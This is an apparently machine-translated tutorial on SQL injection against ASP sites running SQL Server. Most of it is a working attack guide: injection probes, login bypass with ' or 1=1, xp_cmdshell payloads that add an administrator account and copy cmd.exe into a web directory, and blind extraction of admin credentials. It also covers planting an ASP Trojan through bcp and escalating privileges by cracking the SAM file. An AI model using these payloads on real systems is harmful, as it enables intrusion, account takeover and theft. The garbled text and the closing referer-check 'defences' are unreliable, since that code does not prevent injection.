About SQL injection

Thinking is most important. In fact, many people don't know what SQL can do. The following is the general idea of SQL injection intrusion:

1.SQL injection vulnerability judgment is to find the injection point.

2. Judge the background database type

3. Determine the executable conditions of XP_CMDSHELL; If the account currently connected with data has SA permission, and the extended stored procedure of master.dbo.xp_cmdshell (calling this stored procedure can directly use the shell of the operating system) can be executed correctly, then the whole computer can be completely controlled by several methods, that is, the whole injection process can be completed, otherwise, continue:

1. Discover the WEB virtual directory.

2. Upload ASP Trojan;

3. Get administrator permissions

Specific steps:

First, the judgment of SQL injection vulnerabilities.

If you haven't played injection before, please check the box in front of IE menu-Tools-Internet Options-Advanced-Display friendly HTTP error message.

In order to explain the problem clearly, the following is /news.asp? Id=xx (this address is fictitious). For example, xx can be an integer or a string.

1, the judgment of integer parameters

When the input parameter xx is an integer, the original SQL statement in news.asp is generally as follows:

Select * from table name, where field =xx, so that you can use the following steps to test whether SQL injection exists.

The simplest way to judge.

/news.asp？ Id=xx' (with single quotation marks),

At this point, the SQL statement in news.asp becomes.

Select * from table name, where field =xx',

If the program does not filter "",it will prompt news.asp to run abnormally; But although this method is simple, it is not the best, because:

First, IIS of each server may not return a specific error prompt to the client. If statements such as cint (parameter) are added to the program, SQL injection will not succeed, but the server will also report an error. The specific prompt message is that the server has an error when processing URL. Please contact the system administrator.

Second, at present, most programmers have filtered out "",so they can't use ""to test the injection point, so they generally use the classic 1= 1 and 1=2 test methods, as shown below:

/news.asp？ With ID = XX and 1 = 1, news.asp is operating normally.

What about /news.asp? Id=xx running results are the same;

/news.asp？ ID = XX and 1 = 2, news.asp is running abnormally; (This is the classic judgment method of 1= 1 1=2).

If the above conditions are met, there will be a SQL injection vulnerability in news.asp, otherwise it may not be injected.

2. Judgment of string parameters

The method is basically the same as the numerical parameter judgment method.

When the input parameter xx is a string, the original SQL statement in news.asp is usually as follows:

Select * from table name, where field ='xx', so that you can use the following steps to test whether SQL injection exists.

/news.asp？ Id=xx' (with a single quotation mark), news.asp's SQL statement becomes.

Select * from table name where field = xx', news.asp runs abnormally;

/news.asp？ ID = XX and' 1' =' 1', news.asp is operating normally,

What about /news.asp? Id=xx running results are the same;

/news.asp？ ID = xx and' 1' =' 2', news.asp is running abnormally;

If the above conditions are met, there is a SQL injection vulnerability in news.asp, otherwise it cannot be injected.

3. Handling of special circumstances

Sometimes ASP programmers will filter out characters such as single quotation marks to prevent SQL injection. At this time, you can try it in the following ways.

① mixed case method: Because VBS is case-insensitive, programmers usually filter all uppercase strings or all lowercase strings when filtering, and mixed case is often ignored. For example, use SELECT instead of SelecT, select, etc. ;

(2) UNICODE method: In IIS, we use the UNICODE character set to realize internationalization, and we can completely convert the string input in IE into a UNICODE string for input. For example +=%2B, space =%20, etc. See Annex I for the information of URLEncode;

(3) ③ASCII code method: all or part of characters can be entered.

& lt4> In addition to the above methods, there is a simpler way to use ready-made tools, such as NBSI of NB Alliance, which is a very good tool, and the latest version is 2.2.

Second, judge the database type.

Different databases have different functions and injection methods, so before injection, we should judge the type of database. Generally, the most commonly used databases of ASP are Access and SQLServer, and more than 99% websites on the Internet are one of them.

How can the program tell you what database it uses? Let's see:

SQLServer has some system variables. If the server IIS prompt is not closed and SQLServer returns an error prompt, you can get it directly from the error message. The method is as follows:

/news.asp？ Id = xx and user & gt0

This sentence is very simple, but it contains the essence of SQLServer's unique injection method. I found this efficient guessing method in an unintentional test myself. Let me see what it means: first of all, the previous statement is normal, focusing on users >; 0, as we know, user is a built-in variable of SQLServer, its value is the user name of the current connection, and its type is nvarchar. Comparing the value of nvarchar with the number 0 of int, the system will first try to convert the value of nvarchar to int type. Of course, there will be errors in the process of conversion. The error prompt of SQLServer is a syntax error when converting the value of nvarchar“ABC "to a column with the data type of int. Hehe, abc is the value of variable user, so you can get the user name of the database as easy as blowing off dust. In the next few pages, you will see many sentences that use this method. By the way, as we all know, the user sa of SQLServer is a role equivalent to Adminstrators. With the permission of sa, it is almost certain that he can get the administrator of the host. The above method can easily test whether you log in with sa. It should be noted that if you log in with sa, the prompt is that there is an error in the column that converts "dbo" into int, not "sa".

How to determine the database type if the server IIS does not allow returning error prompts? We can start with the difference between Access and SQLServer. Both Access and SQLServer have their own system tables, such as the table used to store all the objects in the database. Access is in the system table [msy objects], but reading this table in the Web environment will prompt "no permission", and SQLServer is in the table [sysobjects], which can be read normally in the Web environment.

When the injection is confirmed, use the following statement:

/news.asp？ Id = xx and (select count (*) from sysobjects) > 0

/news.asp？ Id = xx and (select count (*) from msysobjects) > 0

If the database is SQLServer, then the page of the first URL is the same as the original page /news.asp? Id=xx is roughly the same; The second URL will prompt an error because the table msysobjects cannot be found. Even if the program has fault tolerance, the page is completely different from the original page.

If the database uses Access, the situation is different. The page of the first URL is completely different from the original page. The second website, depending on whether the database settings allow reading system tables, is generally not allowed, so it is completely different from the original website. In most cases, you can know the database type used by the system with the first URL, and the second URL is only used for verification when opening IIS error prompt.

Third, determine the executable situation of XP_CMDSHELL.

If the account currently connected with data has SA permission, and the master.dbo.xp_cmdshell extended stored procedure (calling this stored procedure can directly use the shell of the operating system) can be executed correctly, then the whole computer can be completely controlled by the following methods, and all subsequent steps can be omitted.

1 、/news.asp？ Id=xx and user >; 0 news.asp executes an exception, but you can get the user name of the currently connected database (if dbo is displayed, it means SA).

2 、/news.asp？ id = xx and db _ name()& gt； 0 news.asp executes an exception, but you can get the database name of the current connection.

3 、/news.asp？ Id = xxexecmaster .. XP _ cmdshell "net useraabbb/add"-(master is the main data of SQL-SERVER.

Library; The semicolon in the name indicates the name of the statement before SQL-SERVER finishes executing the semicolon, and continues to execute the subsequent statements; The "-"sign is a comment, indicating that everything behind it is just a comment, and the system will not execute it. ) You can directly add an operating system account aaa, and the password is bbb.

4 、/news.asp？ Id = xxexecmaster .. xp _ cmdshell "net local group administrator AAA/add "- Add the newly added.

The account aaa of was added to the administrators group.

5 、/news.asp？ Id = xx backuup database database name to disk =' c: \ inetpub \ wwwroot \ save.db' and then get the data content.

Back it all up to the WEB directory, and then download this file by HTTP (of course, you must know the WEB virtual directory first).

6. Create UNICODE vulnerabilities by copying CMD.

/news.asp？ id = xxexec master . dbo . XP _ cmdshell " copy c:\ win nt \ system32 \ cmd . exe

C:\inetpub\scripts\cmd.exe "creates a UNICODE vulnerability, and controls the whole computer by using this vulnerability (of course, knowing the WEB virtual directory is the first choice).

In this way, you have successfully completed an attack on SQL injection. Take it easy. In practice, you will find that this is much more difficult than theory. There will be more difficulties waiting for you. Go on, if the above conditions are not established, you still need to continue to struggle.

Go on ~!

When the above conditions are not met, the following steps should be continued.

(A), the discovery of WEB virtual directory

Only by finding the WEB virtual directory can we determine the location where the ASP Trojan horse is placed, and then obtain user rights. There are two methods that are more effective.

One is to guess by experience. Generally speaking, the WEB virtual directory is: c: \ inetpub \ wwwroot;

d:\ inetpub \ wwwroot； E:\inetpub\wwwroot, etc. , the executable virtual directory is:

c:\ inetpub \ scripts； d:\ inetpub \ scripts； E:\inetpub\scripts, etc.

The second is to traverse the directory structure of the system, analyze the results, and find the WEB virtual directory;

First, create a temporary table: temp.

/news.asp？ Id = xx create tables temp(id nvarchar(255), num 1 nvarchar(255), num2 nvarchar(255), num3.

nvarchar(255))； -

Next:

1 We can use xp_availablemedia to get all the current drives and store them in the temp table:

/news.asp？ Id = xx insert temp execmaster.dbo.xp _ availablemedia; -

We can get the list of drives and related information by querying the contents of temp.

2 We can use xp_subdirs to get the subdirectory list and store it in the temp table:

/news.asp？ Id = xx is inserted into temp (id) execmaster.dbo.xp _ subdirs' c: \'; -

3 We can also use xp_dirtree to get the directory tree structure of all subdirectories and put it in the temp table:

/news.asp？ Id = xx is inserted into temp(id, num1) execmaster.dbo.xp _ dirtree' c: \'; -

In this way, you can successfully browse all directory (folder) lists:

If we need to view the contents of the file, we can execute xp_cmdsell:

/news.asp？ Id = xx insert temp (id) execmaster.dbo.xp _ cmdshell' type c: \ web \ index.asp'; -

Use the "bulk insert" syntax to insert a text file into a temporary table. Such as: bulk insert temp (id) from "C: \ inetpub \ wwwroot \ index.asp".

Browse to temporarily view the contents of the index.asp file! By analyzing various ASP files, we can get a lot of system information, website construction and management information, and even get the connection password of SA account.

Of course, if xp _ cmshell can be executed, we can use it to complete:

/news.asp？ Id = xx is inserted into temp (id) execmaster.dbo.xp _ cmdshell' dir c: \'; -

/news.asp？ Id = xx is inserted into temp (id) execmaster.dbo.xp _ cmdshell' dir c: \ *. ASP/s/a '； -

Through xp_cmdshell, we can see everything we want, including W3svc.

/news.asp？ Id = xx' is inserted into temp (id) execmaster.dbo.xp _ cmdshell' cscript.

c:\ Inetpub \ admin scripts \ adsutil . VBS enum w3svc '

However, if we don't have SA permission, we can still use it.

/news.asp？ Id = xx is inserted into temp(id, num1) execmaster.dbo.xp _ dirtree' c: \'; -

note:

1. Everything in TEMP should be deleted after each browsing. The deletion method is as follows:

/news.asp？ Id = xx deleted from temp; -

2. The way to browse the temporary table is: (assuming TestDB is the name of the currently connected database)

/news.asp？ Id=xx and (select top1id from TestDB.dbo.temp) > 0.

Get the value of the id field of the first record in the table TEMP and compare it with an integer. Obviously, news.asp works abnormally, but the value of the id field can be found in the exception. Assuming that the discovered table name is xyz, then

/news.asp？ Id=xx and (select top1id from TestDB.dbo.temp) > 0, where ID is not ('XYZ ')& gt；; 0

Gets the value of the id field of the second record in the table TEMP.

(2), upload ASP Trojan horse

The so-called ASP Trojan Horse is to put the ASP code with special functions into the script of the WEB virtual directory, which can be executed by remote customers through IE, and then obtain the user rights of the system to realize the initial control of the system. There are generally two effective ways to upload ASP Trojans:

1, using the remote management function of the WEB.

In order to facilitate maintenance, many websites provide remote management functions. There are also many websites whose content is that different users have different access rights. In order to control users' rights, everyone has a web page and needs a user name and password. Only by entering the correct values can the next operation be carried out and the management of the WEB be realized, such as uploading and downloading files, browsing directories, modifying configurations, etc.

Therefore, if you get the correct user name and password, you can not only upload ASP Trojans, but sometimes even get the user's right to browse the system directly, and you can omit the complicated operation of "discovering WEB virtual directories" in the previous step.

User names and passwords are usually stored in a table. Finding this table and reading its contents can solve the problem. Here are two effective methods.

First, the injection method:

Theoretically, there are some types of authentication web pages, such as:

In the statement of select * from admin where username =' XXX' and password =' yyy', it is easy to realize SQL injection if the necessary character filtering is not carried out before the statement is officially run.

If you enter: ABC' or 1 = 1- in the user name text box and: 123 in the password box, the SQL statement will become:

Select * from admin, where user name ='abc' or 1= 1 and password =' 123'

No matter what user name and password the user enters, this statement can always be executed correctly, and the user can easily fool the system and obtain legal identity.

B, guess the solution:

The basic idea is: guess all database names, guess each table name in the database, analyze the table names that may store user names and passwords, guess each field name in the table, and guess the contents of each record in the table.

Guess all the database names.

/news.asp？ id = xx and(select count(*)from master . dbo . sysdatabases where name & gt； 1 and dbid = 6) <; & gt0

Because the value range of dbid is from 1 to 5, it is used by the system. Therefore, the user's own construction must start from 6. We submitted the name & gt1(the name name field is a character field, and it will be wrong to compare it with the number). news.asp works abnormally, and the first database name can be obtained. Similarly, by changing DBID to 7, 8, 9, 10, 1 1, 12 respectively, all database names can be obtained.

The database name obtained by the following assumptions is TestDB.

Guess the name of the user name table in the database

Guess: This method guesses the table name according to personal experience. Generally speaking,

Users, users, members, members, user lists, member lists, user information, managers, administrators, administrator users, system users,

System user, system user, system user, system account, system account, etc. Judging from the verdict.

/news.asp？ Id = xx and (select count (*) from testdb.dbo.tablename) > 0 If the table name exists, the news.asp works normally, otherwise it is abnormal. Repeat this cycle until you guess the name of the system account table.

Reading method: SQL-SERVER has a table sysobjects, which is used to store system core information. All tables, views and other information about the library are stored in this table and can be accessed through the WEB.

When xtype =' u' and status >; 0 represents a user-created table. By discovering and analyzing the tables and names created by each user, the names of user name tables can be obtained. The basic implementation method is as follows:

①/news.asp？ Id=xx and (select top1name from testdb.dbo.sysobjects where xtype='U' and status & gt0) >; 0

Get the name of the table created by the first user and compare it with an integer. Obviously, news.asp is working abnormally, but the name of the table can be found in the abnormality. Assuming that the discovered table name is xyz, then

②/news.asp？ Id=xx and (select top1name from testdb.dbo.sysobjects where xtype='U' and status & gt0 and.

The name does not exist ('XYZ ')& gt；; 0 can get the names of the tables created by the second user. Similarly, you can get the names of all tables created by.

According to the table name, it can generally be assumed that the user of the table has stored the user name and password. Let's assume that this table is named Admin.

Guess the names of the username and password fields.

There must be a username field and a password field in the admin table. Only by getting the names of these two fields can we get the contents of these two fields. How to get their names? There are also two ways.

Guess solution: this method guesses the field name according to personal experience. Generally speaking, the names of user name fields are commonly used: user name, name, user, account number, etc. Commonly used password field names are: password, pass, pwd, passwd, etc. Judging from the verdict.

/news.asp？ Id=xx and (select count from TestDB.dbo.admin) > 0 "select count from table name"

Statement to get the number of rows in the table, so if the field name exists, news.asp works normally, otherwise it is abnormal. Repeat this cycle until you guess the names of the two fields.

Reading method: the basic realization method is

/news.asp？ id = xx and(select top 1 col _ name(object _ id(' admin ')， 1 from testdb . dbo . sysobjects)& gt； 0 。

Select top1col _ name (object _ id ('admin'),1) from testdb.dbo.sysobjects is the first field name of a known table name obtained from sysobjects. Compared with integers, it is obvious that news.asp works abnormally, but the field name can be found in the abnormality. Replace 1 in col _ name (object _ id ('admin'), 1) with 2, 3, 4, 5, 6… to get all field names.

Guess the username and password.

The most common and effective way to guess the user name and password content is:

Word-by-word decoding of ASCII code: Although this method is slow, it is certainly feasible. The basic idea is to guess the length of the field first and then guess the value of each bit in turn. The method of guessing user name is the same as guessing password. Here is an example to illustrate the process of guessing the user name.

/news.asp？ Id=xx and (select top 1 len (user name) from TestDB.dbo.admin =X(X= 1, 2,3,4,5, … n, user name.

Is the name of the user name field and admin is the name of the table). If X is a certain value I, and news.asp is running normally, I is the length of the first user name. For example, when input

/news.asp？ When ID = xx and (select top1len (username) from testdb.dbo.admin) = 8, news.asp is running normally, so the length of the first user name is 8.

/news.asp？ Id = xx and (select top 1 ascii (substring (username, m,1)) from testdb.dbo.admin) = n (the value of m is between1and the length of the user name obtained in the previous step, when m= 1, 2 ... the value of n is the ASCII value of 1~9, a~z and A~Z, that is, any value between 1 and 128; Admin is the name of the system user account table). If n is a certain value I, and news.asp works normally, then the ASCII code corresponding to I is a certain value of the user name. For example, when input

/news.asp？ When ID = xx and (select top1ASCII (substring (username, 3,1)) from testdb. dbo. admin) = 80, news.asp is running normally, then the third place of user name is P (the ascii of P is 80); /news.asp？ When ID = xx and (select top1ascii (substring (username, 9,1)) from testdb.dbo.admin) = 33, news.asp is running normally, so the 9th place of the user name is! (! After the ASCII of is 80 guesses the first user name and password, all other user names and passwords can be guessed in the same way. Note: Sometimes the password obtained may be encrypted information such as MD5. , and need to use special tools to decrypt. Or change the password first and then change it back after use. Please refer to the following instructions. Simple method: guess the user name with /news.asp? Id=xx and (select the top 1 flag from TestDB.dbo.admin, where username & gt 1), flag is a field in the management table, and username is a user name field. At this point, news.asp works abnormally, but can get the value of the user name. In the same way as above, you can get the second user name, the third user name and so on, until all the user names in the table.

Guess the user password: /news.asp? Id=xx and (select the top 1 flag from TestDB.dbo.admin, where pwd> 1), flag is a field in the admin table, and pwd is a password field. At this time, news.asp works abnormally, but can get the value of pwd. As above, you can get the password of the second user name, the password of the third user, and so on until the passwords of all users in the table. Passwords are sometimes encrypted with MD5 and can be changed.

/news.asp？ Id = xx Update testdb.dbo.adminsetpwd =' A0B923820DCC509a' where the MD5 value of username =' www-( 1) is: AAABBBCCCDDDEEEF, that is, change the password to1; Www is a known user name) You can of course change the password to its original value in the same way.

2. Use the function of converting table contents into files.

SQL has BCP command, which can import the contents of the table into a text file and put it in the specified location. Using this function, we can first set up a temporary table, then input an ASP Trojan horse line by line in the table, and then export it with BCP command to form an ASP file.

The command line format is as follows:

Bcp "select * ... foo" query out c: \ inetpub \ wwwroot \163.asp–c–slolocalhost–u sa–p foobar from the text.

(the' s' parameter is the server executing the query, the' u' parameter is the user name, and the' p' parameter is the password, and finally a Trojan horse of 163.asp is uploaded).

3. Use tools, such as the most important table names of some reference data given by NBSI:

select * from sysobjects

System object ncsysobjects

sysindexes tsysindexes

syscolumns

System type

system user

System database

sysxlogins

System process

Some of the most important user names (existing in the default sql database)

public

dbo

Guests (generally prohibited, or without permission)

db_sercurityadmin

ab_dlladmin

Some default extensions

xp_regaddmultistring

xp_regdeletekey

xp_regdeletevalue

xp_regenumkeys

xp_regenumvalues

xp_regread

xp_regremovemultistring

xp_regwrite

Xp _ availablemedia media drive related

Xp _ Directory Tree Directory

Xp_enumdsn ODBC connection

Xp_loginconfig server security mode information

Xp_makecab creates a compressed volume

Xp_ntsec_enumdomains domain information

Xp_terminate_process terminal process, giving a PID.

(3), get the system administrator permissions

ASP Trojans only have user rights. In order to gain complete control of the system, they also need administrator rights of the system. What can we do? There are many ways to improve the authority:

Upload a Trojan horse and modify it. Ini files that start automatically (once restarted, they will die);

Copy CMD.exe into the script to artificially create UNICODE vulnerabilities;

Download SAM file and crack it to get all user names and passwords of OS;

And so on, according to the specific situation of the system, different methods can be adopted.

So how do we prevent injections? The program can be added to asp or html or php or cgi as follows. Tested. Add at the beginning of the top.asp document.

Method 1:

& lt%if session("username"= ""or session("userkey"="" then

Response. Redirect "../../"

End if%>

(Note: as long as there is user injection, jump to the ../../directory, hehe, see how you inject me)

Method 2:

& lt%

Server_v 1=Cstr (request. ServerVariables("HTTP_REFERER ")

Server_v2=Cstr (request. ServerVariables ("server name")

if mid(server_v 1，8，len(server _ v2))& lt； & gt then server_v2

Response.write "& ltbr & gt & ltbr & gt< center & gt< tableborder =1cellpadding = 20bbordercolor = blackbbgcolor = # eeeeeeewidth = 450 >

response.write " & lttr & gt& lttd style="font:9pt Verdana " >

The path you submitted is wrong. It is forbidden to submit data from outside the website. Please don't mess with this parameter! "

response.write " & lt/TD & gt； & lt/tr & gt； & lt/table & gt； & lt/center >

Response. End

If ... it will be over.

% & gt

(Note: As long as there is user injection, it is judged as an external connection, hehe, see how you inject me)

Method 3:

& lt% dim From_url，Serv _ url

From_url = Cstr (request. ServerVariables("HTTP_REFERER ")

Serv_url = Cstr (request. ServerVariables ("server name")

if mid(From_url，8，len(Serv _ URL))& lt； & gt then Serv_url

Answer: Write "No"

response.redirect("../"

Response. End

End if%>